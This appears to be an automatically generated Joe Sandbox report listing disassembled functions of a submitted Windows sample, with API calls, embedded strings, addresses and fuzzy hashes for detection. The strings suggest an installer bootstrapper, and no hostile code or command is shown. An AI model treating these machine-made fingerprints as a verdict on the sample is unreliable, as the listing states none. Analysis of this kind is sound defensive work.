Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: String$AllocFree
String ID: `5w$xmlutil.cpp
API String ID: 344208780-26783885
Opcode ID: df69b5d2f81aca8ce93ad5b002a864484ae7e9716aee75e83b405f98540c28f4
Instruction ID: 706640048af2c826cfcf4b09bea59183cc5e89fcb999647120ae1e0d98b06222
Opcode Fuzzy Hash: df69b5d2f81aca8ce93ad5b002a864484ae7e9716aee75e83b405f98540c28f4
Instruction Fuzzy Hash: BDF09035241214A7CB325E48AC08E9F7BACFB41B61F24451AFC045B290C775DA0096E0

Function 004DF2D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009001,00000000,?), ref: 004DF2EE
GetLastError.KERNEL32 ref: 004DF2F8

Strings

EngineForApplication.cpp, xrefs: 004DF31C
Failed to post plan message., xrefs: 004DF326

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post plan message.
API String ID: 2609174426-2952114608
Opcode ID: 99835c6fa2f1b3c0c9b060cf50fac7a1acd95b7ca8feced4d865d7d8523dd07d
Instruction ID: f44882c41b0fdb60af92aed424e2cd30fd58827b5f100d573d36bd8218370c4a
Opcode Fuzzy Hash: 99835c6fa2f1b3c0c9b060cf50fac7a1acd95b7ca8feced4d865d7d8523dd07d
Instruction Fuzzy Hash: 3FF0A7376412326BE6316A969C0EE8FBFD4FF04B60B024026FD44AB391D665DC0081E4

Function 004DF3E7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009005,?,00000000), ref: 004DF3FC
GetLastError.KERNEL32 ref: 004DF406

Strings

Failed to post shutdown message., xrefs: 004DF434
EngineForApplication.cpp, xrefs: 004DF42A

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post shutdown message.
API String ID: 2609174426-188808143
Opcode ID: 405358cdab64b73631b027e83e632f0be51edb5943ff53acba4e82bdfa4195af
Instruction ID: b47305c8a7e524af9386f56c16a732f6faf20444f93d2fc409b528f6c63bd6a6
Opcode Fuzzy Hash: 405358cdab64b73631b027e83e632f0be51edb5943ff53acba4e82bdfa4195af
Instruction Fuzzy Hash: B4F0A737A4123577D6315A956C0EF8B7F94BF14B60B014027BE14BB392E655DC0086E4

Function 004E07B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(0050B478,00000000,?,004E1717,?,00000000,?,004CC287,?,004C5405,?,004D75A5,?,?,004C5405,?), ref: 004E07BF
GetLastError.KERNEL32(?,004E1717,?,00000000,?,004CC287,?,004C5405,?,004D75A5,?,?,004C5405,?,004C5445,00000001), ref: 004E07C9

Strings

Failed to set begin operation event., xrefs: 004E07F7
cabextract.cpp, xrefs: 004E07ED

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorEventLast
String ID: Failed to set begin operation event.$cabextract.cpp
API String ID: 3848097054-4159625223
Opcode ID: e0b2a50497629ed77477d2dbe886562320a3b584a002282357527e19cb49b2cc
Instruction ID: bee439e32f333aa31d558f517493f513cd22ce5e847211a5ba6f0b14ef87c887
Opcode Fuzzy Hash: e0b2a50497629ed77477d2dbe886562320a3b584a002282357527e19cb49b2cc
Instruction Fuzzy Hash: F1F0EC3754267267E23166975D0AB8F7A84AF04B72B11012BFE11BB380E658AC80D6ED

Function 004DEBCB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009003,00000000,?), ref: 004DEBE0
GetLastError.KERNEL32 ref: 004DEBEA

Strings

Failed to post apply message., xrefs: 004DEC18
EngineForApplication.cpp, xrefs: 004DEC0E

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post apply message.
API String ID: 2609174426-1304321051
Opcode ID: e7dd5e79014c37a2af7d681e6f445add824126a7671a75b120ffc233445fda60
Instruction ID: 4e5e85be45a6e8e541ccedf828bffff26d0cbf5dbc2e70b89bb91d00db5efe06
Opcode Fuzzy Hash: e7dd5e79014c37a2af7d681e6f445add824126a7671a75b120ffc233445fda60
Instruction Fuzzy Hash: 3CF0A737A5123577E63126969C0DE8FBE94FF04F70B024016FE18AE381D665DC0092E4

Function 004DEC5C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009000,00000000,?), ref: 004DEC71
GetLastError.KERNEL32 ref: 004DEC7B

Strings

Failed to post detect message., xrefs: 004DECA9
EngineForApplication.cpp, xrefs: 004DEC9F

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post detect message.
API String ID: 2609174426-598219917
Opcode ID: 24b399c1aa05db9f6a45151a639c32e9072e2b4c3cecb31fa5dff880bbbdcc5a
Instruction ID: a5e40acf5d295449dc0bbe1b15f23940b396066a0809e6979d238089c00fbed5
Opcode Fuzzy Hash: 24b399c1aa05db9f6a45151a639c32e9072e2b4c3cecb31fa5dff880bbbdcc5a
Instruction Fuzzy Hash: E1F0A73765123167E6316A969C0DF8BBF94FF04F71B124016BE08AE381D665DC00D1E8

Function 004F6B76 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 004F6C01
__alldvrm.LIBCMT ref: 004F6E02
__alldvrm.LIBCMT ref: 004F6E24

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
Instruction ID: c2cd53a380e153582b78ff764c56813cbbbfe00f109bccb2f1e52dd7019330b1
Opcode Fuzzy Hash: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
Instruction Fuzzy Hash: 02A12776A0038A9FDB218F29C8817BFBBA5EF51310F16416FE6859B382C63C9D41C759

Function 00505EC5 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 163stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 00505F92
lstrlenW.KERNEL32(00000000), ref: 00505FAA

Strings

dlutil.cpp, xrefs: 00506033

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: lstrlen
String ID: dlutil.cpp
API String ID: 1659193697-2067379296
Opcode ID: 5d63c68eba3487e79d1d46759cd49a4790e5281d1350c815a160f3969d8dd96b
Instruction ID: 78dcd3fb8f6d75cbad8ab4c5db46bfa9534ca7fceed1f3247afb624465d58ff7
Opcode Fuzzy Hash: 5d63c68eba3487e79d1d46759cd49a4790e5281d1350c815a160f3969d8dd96b
Instruction Fuzzy Hash: A351C07290162AEBDB229FA58C849AFBFB9FF88710F154114FD00A7280E735DD519FA0

Function 004C4FA4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00000000,?,004C5552,?,?,?,?,?,?), ref: 004C4FFE
DeleteCriticalSection.KERNEL32(?,?,?,00000000,?,004C5552,?,?,?,?,?,?), ref: 004C5012
TlsFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,004C5552,?,?), ref: 004C5101
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,004C5552,?,?), ref: 004C5108

Part of subcall function 004C1161: LocalFree.KERNEL32(?,?,004C4FBB,?,00000000,?,004C5552,?,?,?,?,?,?), ref: 004C116B

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalDeleteFreeSection$CloseHandleLocal
String ID:
API String ID: 3671900028-0
Opcode ID: 7badc4835b954f4e5510dbeeefeed0b9db8b46f2a11345a8e41b5f74f555b48b
Instruction ID: d975c5cfbea782ea841825fa73ab7630db3dc55a5a7d2caf7e81e2ef219c2479
Opcode Fuzzy Hash: 7badc4835b954f4e5510dbeeefeed0b9db8b46f2a11345a8e41b5f74f555b48b
Instruction Fuzzy Hash: C641EE75500B0567DA70EBB2C88DF9B77ECAF44344F44082EB299D3151EB38F5458B68

Function 00506067 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00505FD0,00000000,00000000,00000001), ref: 005060DF
GetLastError.KERNEL32(?,?,00505FD0,00000000,00000000,00000001), ref: 00506130

Strings

dlutil.cpp, xrefs: 00506103, 00506154
8jR, xrefs: 005060C3

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast
String ID: 8jR$dlutil.cpp
API String ID: 1452528299-53378029
Opcode ID: f40e91be9cc32c5d3608b4886e662fea07888cb092829203f7864aba5204d61b
Instruction ID: d5e68bc92f2a429753a1d1eba16e69bf1318a7be3e6583f02be8a3eb069392bb
Opcode Fuzzy Hash: f40e91be9cc32c5d3608b4886e662fea07888cb092829203f7864aba5204d61b
Instruction Fuzzy Hash: 8A31F53694022AABD7329F958D49F5F7EB8BF41B60F120219FD00A72D1D735CD10D6A1

Function 004C4C86 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 004CF96C: RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,004C4CA5,?,?,00000001), ref: 004CF9BC

CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000001,00000000,?,?,?), ref: 004C4D0C

Strings

Failed to get current process path., xrefs: 004C4CCA
Unable to get resume command line from the registry, xrefs: 004C4CAB
Failed to re-launch bundle process after RunOnce: %ls, xrefs: 004C4CF6

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Close$Handle
String ID: Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry
API String ID: 187904097-642631345
Opcode ID: b69fcd5c0faa0b06ec60641bd80a658bfaac7fa6cd9974c5d9b29fe3cbec781f
Instruction ID: 67059c4bb6a8328cd93dc3a496434a66f2955e1f097c5eecbf4c1f763ac76b96
Opcode Fuzzy Hash: b69fcd5c0faa0b06ec60641bd80a658bfaac7fa6cd9974c5d9b29fe3cbec781f
Instruction Fuzzy Hash: 2A11B179D01519BBCF22AB95DD55EAEBFB8FF80711B10419BF801B3250E7358E10AB84

Function 004F88B2 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,004F8A56,00000000,00000000,?,004F8859,004F8A56,00000000,00000000,00000000,?,004F8A56,00000006,FlsSetValue), ref: 004F88E4
GetLastError.KERNEL32(?,004F8859,004F8A56,00000000,00000000,00000000,?,004F8A56,00000006,FlsSetValue,00522404,0052240C,00000000,00000364,?,004F6230), ref: 004F88F0
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004F8859,004F8A56,00000000,00000000,00000000,?,004F8A56,00000006,FlsSetValue,00522404,0052240C,00000000), ref: 004F88FE

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 13273946b5afb2354efe36c51b3a0f970dc6c366e7e6242551dff5fa31468ce6
Instruction ID: f69d1305027a64d93aa6397a405cc988fe54e0c1f1eaf97dbccc928d620ab9ed
Opcode Fuzzy Hash: 13273946b5afb2354efe36c51b3a0f970dc6c366e7e6242551dff5fa31468ce6
Instruction Fuzzy Hash: 56014C7730122BABDB214B789C44D7F7798EF25BA17100529FA15EB240DB64DC01C7E5

Function 004F615E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,004F1AEC,00000000,80004004,?,004F1DF0,00000000,80004004,00000000,00000000), ref: 004F6162
SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 004F61CA
SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 004F61D6
_abort.LIBCMT ref: 004F61DC

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$_abort
String ID:
API String ID: 88804580-0
Opcode ID: 92bd064d6180905d50d1aa0e51c844ece4a4359de6f2d7b9d11a1e9c52732bcd
Instruction ID: 1d7eadfd53d1ce2a846cf60652ba7b37af490cdde19afacf1603f9702ef123a2
Opcode Fuzzy Hash: 92bd064d6180905d50d1aa0e51c844ece4a4359de6f2d7b9d11a1e9c52732bcd
Instruction Fuzzy Hash: 5FF0F436600A1AA7D22237366D0EB3F2A599FC1775F27011FFB1896293FF2C9806502D

Function 004C7435 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 004C7441
LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 004C74A8

Strings

Failed to get value of variable: %ls, xrefs: 004C747B
Failed to get value as numeric for variable: %ls, xrefs: 004C7497

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-4270472870
Opcode ID: a75d34d6acc84d5a910c70c9d8cee952640524d1f52f0df9ece805b1df39bdcf
Instruction ID: 92b29f6162feb69487f43bd871552d225f6ea254b4f9183169663a0ac046c510
Opcode Fuzzy Hash: a75d34d6acc84d5a910c70c9d8cee952640524d1f52f0df9ece805b1df39bdcf
Instruction Fuzzy Hash: 3C01713A944128FBCF555F54CC09F9E7F64AF10761F00816AFC04AA261C33A9E509BDD

Function 004C75AA Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 004C75B6
LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 004C761D

Strings

Failed to get value of variable: %ls, xrefs: 004C75F0
Failed to get value as version for variable: %ls, xrefs: 004C760C

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-1851729331
Opcode ID: f1be1e690de9a67d231233be276a8730a3b8880e1ea232cf26b0aec518d178f7
Instruction ID: 2f4df81144fb1c69a705f9c8770c11bda6328a9b4e67eebf0bd4eae3c1b5aeae
Opcode Fuzzy Hash: f1be1e690de9a67d231233be276a8730a3b8880e1ea232cf26b0aec518d178f7
Instruction Fuzzy Hash: 5101B13A904529FBCF115F44CC09F9E3F24EF103A1F00412AFC04AA261D33A9E509BD8

Function 004C7539 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,004C9897,00000000,?,00000000,00000000,00000000,?,004C96D6,00000000,?,00000000,00000000), ref: 004C7545
LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,004C9897,00000000,?,00000000,00000000,00000000,?,004C96D6,00000000,?,00000000), ref: 004C759B

Strings

Failed to get value of variable: %ls, xrefs: 004C756B
Failed to copy value of variable: %ls, xrefs: 004C758A

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-2936390398
Opcode ID: caac6de100658b887ea636f95c7df6265ee31ef1dd20307e7ea01820189b2d17
Instruction ID: a02a91f1fb313b1afa59205a52170d222eff861ab197e79759f0d58abe414bc8
Opcode Fuzzy Hash: caac6de100658b887ea636f95c7df6265ee31ef1dd20307e7ea01820189b2d17
Instruction Fuzzy Hash: 79F0C83A944228FBCF125F54CC09E9E3F68EF14361F008155FD04A6261C73A9E51ABD4

Function 004EE776 Relevance: 6.0, APIs: 4, Instructions: 26timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 004EE788
GetCurrentThreadId.KERNEL32 ref: 004EE797
GetCurrentProcessId.KERNEL32 ref: 004EE7A0
QueryPerformanceCounter.KERNEL32(?), ref: 004EE7AD

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: b19427a5a049c975c9e91337cb6bedfc926005174a8d36569e27b88a1523f2c8
Instruction ID: d3debbc4d6f4f3f3a9a4b50a30af1bf157186ef6b1b0974a575d47458198a519
Opcode Fuzzy Hash: b19427a5a049c975c9e91337cb6bedfc926005174a8d36569e27b88a1523f2c8
Instruction Fuzzy Hash: 00F04D71C1020DEBDB04DBB4D989A9EBBF8EF18315F614995A415E7110E734AB08DB61

Function 00500C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000), ref: 00500DD7

Strings

regutil.cpp, xrefs: 00500DC4

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Close
String ID: regutil.cpp
API String ID: 3535843008-955085611
Opcode ID: 2c80d7169d6f4239076544c5b505b4b8e81d9553e478e45a7eb343ea8216424f
Instruction ID: 4501613b1f278572a2f133a7f2fec86a1b4f5f3ead8d15542b92165dcf6e542b
Opcode Fuzzy Hash: 2c80d7169d6f4239076544c5b505b4b8e81d9553e478e45a7eb343ea8216424f
Instruction Fuzzy Hash: A641D833D0152AEBEF319AD4CC04BAEBF61BB40721F159165FD04AA1D0D7759D40ABE0

Function 0050479B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00500F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0052AAA0,00000000,?,005057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00500F80

RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,00000000,00000000,00000101), ref: 005048FC

Strings

PendingFileRenameOperations, xrefs: 005047EC, 005048D4
SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 005047AC

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseOpen
String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
API String ID: 47109696-3023217399
Opcode ID: 8c738c535b180d2b59e81e6c315bf69d797fc0cb7f262e6cb5c31c24c28171ef
